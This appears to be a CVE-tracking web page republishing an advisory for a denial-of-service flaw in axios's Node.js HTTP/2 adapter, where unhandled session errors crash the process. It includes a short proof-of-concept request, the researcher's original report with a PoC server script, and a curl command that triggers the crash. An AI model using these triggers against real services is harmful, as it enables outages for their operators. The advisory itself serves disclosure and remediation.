Critical Alert 1 Active Exploit Detected Today

CVE-2026-76504 — Cisco Catalyst SD-WAN Manager Hex Encoding Vulnerability →
Powered by CVE Watchtower
×

CVE Watchtower

← Back to CVE List

CVE-2026-101901NVD

Vulnerability Summary

## Summary

Axios versions with Node.js HTTP/2 support can terminate the caller’s process when a ClientHttp2Session emits an error event that is not handled by axios.

This affects applications that use the Node HTTP adapter with httpVersion: 2. A malicious, unavailable, or non-HTTP/2 endpoint can cause an uncaught exception instead of a normal rejected axios request.

## Impact

The impact is denial of service. In affected applications, an attacker who can influence the request destination, or operate the destination server, may be able to crash the Node.js process.

This does not affect default HTTP/1.1 usage, browser XHR/fetch adapters, or applications that do not enable axios HTTP/2 support.

## Affected Functionality

Affected path:

- Node.js HTTP adapter
- httpVersion: 2
- HTTP/2 session creation/reuse through Http2Sessions
- Network/session failures emitted as ClientHttp2Session error events

Caller-controlled http2Options can make the issue easier to trigger, but passing arbitrary attacker input into axios config is caller-controlled behavior and should not be the primary advisory framing.

## Technical Details

Http2Sessions.getSession() creates a session with http2.connect(authority, options) but only registers a close handler. It does not register an error handler on the returned ClientHttp2Session.

When the session emits error, Node treats it as an unhandled EventEmitter error and throws. This can bypass the normal axios Promise rejection path and terminate the process.

## Proof of Concept of Attack
```js
import axios from './index.js';

await axios.get('http://127.0.0.1:1/', {
httpVersion: 2,
timeout: 1000
});
```

Expected vulnerable behavior: the process exits with an uncaught ECONNREFUSED session error instead of only rejecting the axios request.

## Workarounds

Disable axios HTTP/2 for untrusted or user-influenced destinations and use the default HTTP/1.1 adapter until a fixed release is available. Also avoid passing attacker-controlled values into http2Options; axios config is trusted application input.

<details>
<summary><h3>Original report</h3></summary>

Hi, i'm RelunSec a security researcher working with **InsiteTech.jp**

i want let you known, i finded a DoS in axios, to reproduce that, that is the example of a server

```js
const http = require('http');
// Import the local axios version to ensure the patch is active
const axios = require('../../lib/axios.js').default;
const url = require('url');

// A public HTTP/2 server to make internal requests to.
// This simulates an external service your application might interact with over HTTP/2.
const TARGET_URL = 'https://nghttp2.org/';
const PORT = 3000;

const server = http.createServer(async (req, res) => {
const parsedUrl = url.parse(req.url, true);
const http2optionId = parsedUrl.query.http2optionId;

if (!http2optionId) {
console.warn(`[SERVER] Rejected request: Missing http2optionId parameter`);
res.writeHead(400, { 'Content-Type': 'text/plain' });
res.end('Error: Missing http2optionId query parameter. Usage: ?http2optionId=value\n');
return;
}

console.log(`[SERVER] Received request with http2optionId: ${http2optionId}`);

// Create an Axios instance configured for HTTP/2
// The 'id' in http2Options makes each session configuration unique.
const axiosInstance = axios.create({
baseURL: TARGET_URL,
httpVersion: 2,
http2Options: {
// rejectUnauthorized: false, // Uncomment if targeting a local HTTP/2 server with self-signed cert
id: http2optionId, // This is the attacker-controlled unique part
},
// Adding a short timeout to prevent attacker from waiting too long if target is slow
timeout: 5000
});

try {
const response = await axiosInstance.get('/');
res.writeHead(200, { 'Content-Type': 'text/plain' });
res.end(`Internal HTTP/2 request successful for ID: ${http2optionId}\nStatus: ${response.status}`);
} catch (error) {
// Check for the specific error indicating session limit reached
if (error.isAxiosError && error.code === axios.AxiosError.ERR_BAD_OPTION_VALUE) {
console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
res.writeHead(500, { 'Content-Type': 'text/plain' });
res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
} else {
console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}:`, error.message);
res.writeHead(500, { 'Content-Type': 'text/plain' });
res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: Generic error - ${error.message}`);
}
}
});

server.listen(PORT, () => {
console.log(`PoC Server listening on http://localhost:${PORT}`);
console.log(`Targeting internal HTTP/2 requests to: ${TARGET_URL}`);
console.log(`Send requests to http://localhost:${PORT}?http2optionId=...`);
console.log(`Expected behavior with current patch: After ~100 unique http2optionIds, subsequent requests will receive ERR_BAD_OPTION_VALUE.`);
});
```

i tested all that in latest git version, after starting the server.cjs, to trigger that you just need do

```rust
relunsec@relunsec:~/software/axios-1/poc/poc$ curl http://127.0.0.1:3000/?http2optionId=hi
curl: (52) Empty reply from server
```

that is extremly simple to trigger

it confirms a DoS in the HTTP/2 session cache, that needs be patched, the impact is will lead the server crashes and shutdown by an attacker, the server is written properly and no flaws in it and try catch blocks and errors handled however because that is an axios internal error will crash
</details>

---
Severity Level
HIGH
Published Date
Sep 28, 2026
Last Modified
Sep 30, 2026
Exploitation Status
No confirmed exploitation yet
CVE Record Status
Published
EPSS Score (30-Day)
0.38%Probability
Root Weakness (CWE)
Refer to the official MITRE database for detailed architectural specifications regarding this weakness.
CVSS v4.0 Base Metrics — Score 8.2
Attack VectorNetwork
Attack ComplexityLow
Attack RequirementsPresent
Privileges RequiredNone
User InteractionNone
Confidentiality (Vulnerable System)None
Integrity (Vulnerable System)None
Availability (Vulnerable System)High
Confidentiality (Subsequent System)None
Integrity (Subsequent System)None
Availability (Subsequent System)None

Affected & Patched Versions

Affected Versions
  • axios >= 1.13.0, < 1.20.0
Patched Versions
Not provided by Private for this CVE.
🎁7-Day Free Trial — Try Pro or Team, no card required.
📧Email Delivery — Threat intel straight to your inbox.
♾️Unlimited Vendors — Track your entire stack.
🚨All New CVEs — Be the first to know.
📈EPSS Spike Alerts — Catch rising risk before it peaks.
🎯Custom EPSS/CVSS — Filter noise, focus on risk.
🛡️Exploit Intel — A 2nd confirmed-exploit signal beyond KEV.
🐙GitHub Issues — Auto-tracked, no duplicates.
📬Weekly Digest — One clean summary, not inbox spam.
🏷️Watchlist Groups — Tag alerts by team (Infra/AppSec/SOC).
💬Webhooks — Slack & Teams integration.
🔀Smart Routing — Critical alerts to one channel, rest to another.
🚫Ad-Free — Uninterrupted experience.
🎁7-Day Free Trial — Try Pro or Team, no card required.
📧Email Delivery — Threat intel straight to your inbox.
♾️Unlimited Vendors — Track your entire stack.
🚨All New CVEs — Be the first to know.
📈EPSS Spike Alerts — Catch rising risk before it peaks.
🎯Custom EPSS/CVSS — Filter noise, focus on risk.
🛡️Exploit Intel — A 2nd confirmed-exploit signal beyond KEV.
🐙GitHub Issues — Auto-tracked, no duplicates.
📬Weekly Digest — One clean summary, not inbox spam.
🏷️Watchlist Groups — Tag alerts by team (Infra/AppSec/SOC).
💬Webhooks — Slack & Teams integration.
🔀Smart Routing — Critical alerts to one channel, rest to another.
🚫Ad-Free — Uninterrupted experience.